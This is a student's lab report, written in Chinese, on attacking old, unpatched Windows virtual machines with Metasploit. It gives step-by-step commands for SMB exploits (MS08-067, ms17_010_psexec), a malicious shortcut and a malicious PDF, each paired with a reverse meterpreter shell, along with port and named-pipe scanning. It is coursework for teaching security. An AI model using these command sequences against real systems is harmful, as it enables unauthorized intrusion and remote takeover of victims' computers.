2018-2019-2 网络对抗技术 20165322 Exp5 MSF基础应用

2018-2019-2 网络对抗技术 20165322 Exp5 MSF基础应用

目录

实验内容与步骤

• 一个主动攻击实践
  • MS08-067(失败)
  • ms17_010_psexec(成功且唯一)
• 一个针对浏览器的攻击
  • ms10_046_shortcut_icon_dllloader
• 一个针对客户端的攻击
  • windows/fileformat/adobe_cooltype_sing
• 成功应用任何一个辅助模块
  • auxiliary/scanner/portscan/tcp
  • 在实验一里用了auxiliary/scanner/smb/pipe_auditor(唯一)

实验过程中遇到的问题

基础问题回答

实验总结与体会

实验内容与步骤

一个主动攻击实践

MS08-067（失败）

• 实验环境：
  • 靶机：Windows xp sp3 中文版
  • 漏洞：exploit/windows/smb/ms08_067_netapi
  • 载荷：generic/shell_reverse_tcp
• 选择了MS08-067安全漏洞msf > use exploit/windows/smb/ms08_067_netapi
• 输入show targets可以查看包含该漏洞的系统靶机（基本上都不会成功呢）
• 输入show payloads可以查看该漏洞可生成的payload类型
• 接着进行设置

msf exploit(ms08_067_netapi) > set payload generic/shell_reverse_tcp //设置攻击载荷
msf exploit(ms08_067_netapi) > set LHOST 192.168.132.137 //kali的ip
msf exploit(ms08_067_netapi) > set LPORT 5322 //攻击端口
msf exploit(ms08_067_netapi) > set RHOST 192.168.132.136 //Windows XP机ip，特定漏洞端口已经固定
msf exploit(ms08_067_netapi) > set target 0 //自动选择目标系统类型，匹配度较高
msf exploit(ms08_067_netapi) > exploit //探测并攻击

• emmm好吧……失败了。目前可以成功的靶机有Windows xp sp3英文版和win server2k，我这个中文版的估计打过补丁攻不进去了T^T

返回目录

---

ms17_010_psexec(成功且唯一)

• 实验环境：
  • 靶机：Windows Server 2003 sp2
  • 漏洞：windows/smb/ms17_010_psexec(唯一)（这个漏洞针对的主要是win2003的靶机，xp和win7试过了都不行）
  • 载荷：windows/meterpreter/reverse_tcp
• 打开控制台msfconsole
• 输入help search查看搜索目标漏洞的格式
  
  
• 比如说我想找一个2017年发布的、以exploit为目的、靶机系统为Windows的漏洞，那我就输入search cve:2017 type:exploit platform:Windows
  
  
• 好多同学用了永恒之蓝成功了，我找个它隔壁的吧……就决定是你啦windows/smb/ms17_010_psexec。不过不要着急use它，我们还需要搜索一下靶机可用的管道名。
• 首先利用use auxiliary/scanner/smb/pipe_auditor辅助模块扫描目标网段主机可用的管道名
• 设置靶机地址set rhost 192.168.132.140
• 设置20个线程set threads 20
• 运行一下run
• 可以看到有以下管道可用
  
  
• back退出一下，可以开始准备攻击了
• 选择一个漏洞use windows/smb/ms17_010_psexec
• 然后输入info查看它的详细信息
• 输入show payloads查看载荷
• 设置攻击载荷set payload windows/meterpreter/reverse_tcp
• 输入show options查看要设置的信息
• 设置靶机地址set rhost 192.168.132.140
• 设置靶机端口号set rport 445(这里一定要是445，它开放的端口才行！！)
• 设置要利用的管道名set NAMEDPIPE netlogon
• 开始攻击run
• 攻击成功（激动）
  
  
• 参考资料

返回目录

一个针对浏览器的攻击

• 实验环境：
  • 靶机：Windows 7 x64 + IE8
  • 漏洞：exploit/windows/smb/ms10_046_shortcut_icon_dllloader
  • 载荷：windows/meterpreter/reverse_tcp
• search ms10-046 看看该漏洞的其他exploit
• use exploit/windows/smb/ms10_046_shortcut_icon_dllloader使用漏洞
• show payloads显示可用攻击载荷
• set payload windows/meterpreter/reverse_tcp选择攻击载荷
• show options 查看配置信息
• set LHOST 192.168.132.137 设置监听地址
• set SRVHOST 192.168.132.137设置本地收听地址
• set RHOSTS 192.168.132.136 设置靶机地址
• exploit开始攻击
  
  
• 将/root/.msf4/local/msf.lnk共享到win7虚拟机中，然后双击，即可在kail监听到，输入sessions查看当前会话
  
  
• 输入sessions -i 1即可选择第一个会话，攻击成功
  
  

返回目录

一个针对客户端的攻击

• 实验环境：
  • 靶机：Windows XP
  • 漏洞：windows/fileformat/adobe_cooltype_sing
  • 载荷：windows/meterpreter/reverse_tcp
• search adobe查找软件漏洞
• use windows/fileformat/adobe_cooltype_sing使用漏洞
• show options查看要设置的项
• set payload windows/meterpreter/reverse_tcp选择攻击载荷
• set LHOST 192.168.132.137 攻击者地址
• set LPORT 5322不要选择默认的4444端口，我第一次做的时候后面的操作报错：本机IP地址无法与4444端口绑定
• set FILENAME 20165322.pdf 设置生成pdf文件的文件名
• run生成攻击文件
  
  
• 将生成的pdf文件导入win xp（被攻击主机）下
• kail中输入back退出当前模块，进入监听模块
• use exploit/multi/handler 进入监听模块
• set payload windows/meterpreter/reverse_tcp 选择攻击载荷
• set LHOST 192.168.132.137 设置攻击者地址
• set LPORT 5322这里要设置与上方一样的端口号，以保证成功连接上文件。
• exploit 攻击
• 在靶机中打开pdf文件，在kali中输入指令ipconfig,攻击成功
  
  

返回目录

成功应用任何一个辅助模块

• 实验环境：
  • 靶机：Windows Server 2003 sp2
  • 辅助模块：auxiliary/scanner/portscan/tcp
• 在msfconsole中可通过命令show auxiliary查看所有的辅助模块
• use auxiliary/scanner/portscan/tcp使用一个辅助模块
• show options查看需要填的项
  
  
• set RHOSTS 192.168.132.140设置靶机地址
• set THREADS 15建立线程
• exploit开始攻击
• 连接成功，可以看到TCP端口开放
  
  

返回目录

实验过程中遇到的问题

• 第一个实验中，第一次监听成功了，但是没有反弹连接成功。第二次直接连接失败
  
  

• 查找资料以后，我在winxp里启用了服务中的server,可以找到靶机了，但没法确定服务包……报错直接鼓励我换一个靶机了简直难受。。
  
  

• 猜测是第一次尝试触发漏洞的时候失败了，winxp系统可能直接给这个连接关了禁闭，所以第二次连都连不上了ORZ，只好换靶机。。

返回目录

基础问题回答

用自己的话解释什么是exploit,payload,encode

• exploit：它是一个攻击模块，他负责利用安全漏洞对目标进行攻击。植入和运行攻击载荷，从而获得对靶机的远程目标系统访问权
• payload：指在攻击程序中起关键作用的代码。
• encode：指的可以对一段代码进行编码，从而改变代码的特征。

离实战还缺些什么技术或步骤？

在本次实验中，我们的实现环境是在关闭防火墙状态下进行的。我们通常都是操作靶机配合完成攻击，比如针对客户端软件Adobe的攻击实验里，就需要靶机运行包含payload的pdf文件才能回连成功。在自己配合的情况下靶机都十分难找了，可想而知要实际攻破一个系统的漏洞有多不容易。

返回目录

实验总结与体会

实验本身的原理和操作都挺简单的。但是要自己摸索找到一个唯一可用的漏洞或者payload还是不容易。在上面耗费了不少时间。实际操作失败了很多次，没有一一写进博客里。而且攻击成功的靶机多半都是比较旧的机子了。现在要想攻破一个开着防火墙和杀软的win10系统，感觉基本上是一件不太可能的事。